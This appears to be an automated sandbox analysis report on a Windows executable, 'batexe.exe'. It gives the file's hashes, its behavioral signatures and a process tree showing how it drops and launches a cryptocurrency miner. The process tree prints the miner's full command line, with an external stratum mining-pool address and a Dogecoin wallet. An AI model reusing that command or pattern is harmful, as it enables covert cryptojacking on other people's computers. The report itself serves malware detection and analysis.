Analysis
-
max time kernel
296s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
11/02/2024, 17:43
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4492 b2e.exe 764 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 764 cpuminer-sse2.exe 764 cpuminer-sse2.exe 764 cpuminer-sse2.exe 764 cpuminer-sse2.exe 764 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2732-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2732 wrote to memory of 4492 2732 batexe.exe 74 PID 2732 wrote to memory of 4492 2732 batexe.exe 74 PID 2732 wrote to memory of 4492 2732 batexe.exe 74 PID 4492 wrote to memory of 4688 4492 b2e.exe 75 PID 4492 wrote to memory of 4688 4492 b2e.exe 75 PID 4492 wrote to memory of 4688 4492 b2e.exe 75 PID 4688 wrote to memory of 764 4688 cmd.exe 78 PID 4688 wrote to memory of 764 4688 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\10A5.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\10A5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\10A5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\15B6.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:764
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.1MB
MD5d616799e05c53beba78c647d8464fa9e
SHA1697482be73197b747f538df738945db91fae3aab
SHA256a0b914762382ff77f18dc42baf2c87196fffa5ec7ff2d63f02989b454b619ea2
SHA51290172e49b3eb22ec68cbf1ff82e50470e31918cfc17303a44aff3e14277e80dcbeaf7649cb0b642848af9c1718885b637c1a080bd83d3cec50feeb75275a0812
-
Filesize
5.1MB
MD53065ba287df1f7f3e9a48f1eb846c9a0
SHA10590ff7ba1d0ac75fea47c92bdcbb373e0d3a3c3
SHA2565a435e5524beff912e8fd51a8d7359a4166407ef9920094abf76e3093fb4fd97
SHA512c62f168de45aba51d5e129d9b617602df7202a798b6c45b6f673b8d6fb1d1c5d5349870fbfaef255f1f3c59f9e4b469249645d809e478f08aeb964bee9cb5b6d
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
465KB
MD50bf67c92c7e495d40f387807d483bf60
SHA183486e6a98ced31243ea7da01903fbc6079c8524
SHA256cde2a205c89027c81c79f3013cbd34df5efaadc2f988ca1fbca44b60189dabe5
SHA51296193924362e4e10f36628cdddb6e6adb2ebd22ca24e61d3672fc1fb0e3bd64e3f16cb3985a751e1efc7b07078fe79a9bf309df2c18375549b30faea4975c484
-
Filesize
401KB
MD537528829411f1e1d2ae4d3c4901b6433
SHA1468e7b5c55a3c076ecd430724ff87482261a99c9
SHA2562328fe7ad2e267dc819911624cb400faa1e9ffb510281b8f67a4eb571cd2bb78
SHA5120e27cd5c5b18c93fe6e751e4a0b98f634c1a5b7f6d7284dde725e3efa2fa7f3f47bf1c7a0b6a2cbf71297603bf27b983f5210f4e9567880875b05af113ae91ed
-
Filesize
474KB
MD594481c0bbf74791a300779c5ec44d08c
SHA1043c9532ae4b40cdba9a4117a6abc009fd64907f
SHA256af1a31d7cdf576fd20c242a6d9fde1e8aa7a86c2b76390c8a45b739b37ad392e
SHA512f3d78f3a9558c236e8db0e5c1f26a6ffb0f71e8f5c9f018b66c21671c60565b939b04d6fb77b7b0770f976ca4800faf39bf8691e59fd57b79da7edebe7a6884e
-
Filesize
64KB
MD57fcedb6e973c5df3b6652a2afafa6a13
SHA1116728803559ab58a8127544df80b75a0dd1c6d2
SHA256fd7191afdecd35b78a0c0ca0457cbbf42ffda1e52263cd785abca5f047b18825
SHA51205c86bf84079a2cc13dc7a1a917a0839ccd2b18e0440c4bd419c99f65c4161ac69a9447f56bdf6051b2fbbc49b7556fc3717432d0e293dfae2921c0701fe64fd
-
Filesize
402KB
MD5473554c5f5dd467d2a0a164ccc2732a1
SHA139a28c702e32fc10af44e7e61a826a3bf9d212c6
SHA25603d6c981729eb09a5776f2660899d73bd2187b88ff297c64543e47e2a949f93e
SHA51215add2d521dae8046f3b45a3fb38020f774a17d641e118677aa2c7c24667008c449c16272c9769325aff4377fe77ff0b67573a5a99be9f2464fcb8a6b296d7ae
-
Filesize
281KB
MD5309bb82de3a75ba310922d4b02388d4f
SHA1a3c24d7aaa0ef7b3077d0f21f20b35f435638c37
SHA256c81af00adbc8061f6e0a8cee5a1e2ae1228cf2caf15d4cb7bacfe41b1f3093b3
SHA512d4bedc5c62b3afbb5a99280a802283a6ea25df41639e444d4ee314cabbaf1c81e1abe2c11f113ab0d2c3ce48cbb8697d8c84ca5a33a93a8d0df08ccb4c679b6b
-
Filesize
390KB
MD51b6d66fb875413dcc421c011d7d0f2dd
SHA10a844e5b835b8898fb1d740b044b4b82d5010c08
SHA25677d5f9499bc00b31dce31257f5ad3ff9258c82f25e1232e5e674ab3adc00b095
SHA512ebaa79cd7d92df01cab97ec7c492519f84ad1e950b8ce73940b94dea0c12b12feeaff80654075b4a1aa5d251d117000edfa75258571accee56008c5daa402b4e
-
Filesize
333KB
MD5bd50035709bb7cf253ccf685fc9a5533
SHA1a3341d4982b3e0410f798636271c7eee856c7104
SHA256a5183df0ec16623b0bdf5961f9105be248cc0dd291c54928555db8a6d8ba6235
SHA512fe7b03d631b45af31f230bc6c8e2a00301539319faa940370df416c36b9bf53b78bf840d77fa4e6431d8372b9760ae7c5016f5f0aee3cd8be7bb6904f0249765
-
Filesize
309KB
MD50923763e701eeb21be65358e06d2e07a
SHA1384593ab5f0470e632dd1a953ad55c40362e0ebf
SHA256efcd1d9ce488dfd736801656956e753faa7daa32e54f3698a6a4ec7641be35a2
SHA51259b412cb6053b77c7682e35050f1f53b41da7ab87a638d83978b5c562d299f3004c8c2c032e9e46bf8fe1bf3e80bd8e8d75f55b7f0ce15423a3f96497198f309
-
Filesize
242KB
MD5a59c3d0aad76549a7c31f4405a2bb419
SHA1b51babb0525a48552c9b469a4eedb729085975ec
SHA2560ab5ed7d6d81f67614525d20722a68a5babe3f2f2b56bedd7f7385a3b60dfe45
SHA512753e84b38f93c372b11891e0c8b1e99d933a6406430fe0f65431428c455754c6b7a8c4f99fc287c18bee3139e4255eb6c886939800907d4dd9210baefc920e86
-
Filesize
341KB
MD588722e12f47ae0d1f95073118d5ccd90
SHA147d2a831d71620029dab4a08d394c70b3b394779
SHA2562820a957cdca1611644ffe8385ff9339a89ea3ddfc5ce2a69338140abd0f4813
SHA512885b73a6d16fce6c003b45a3dd983b5e1a8206fcc5fab14140a8bc550c50ac17fff384aa7e90feecdfa249609a0d0449d28a848ec352ab22d60adf5c4b459f12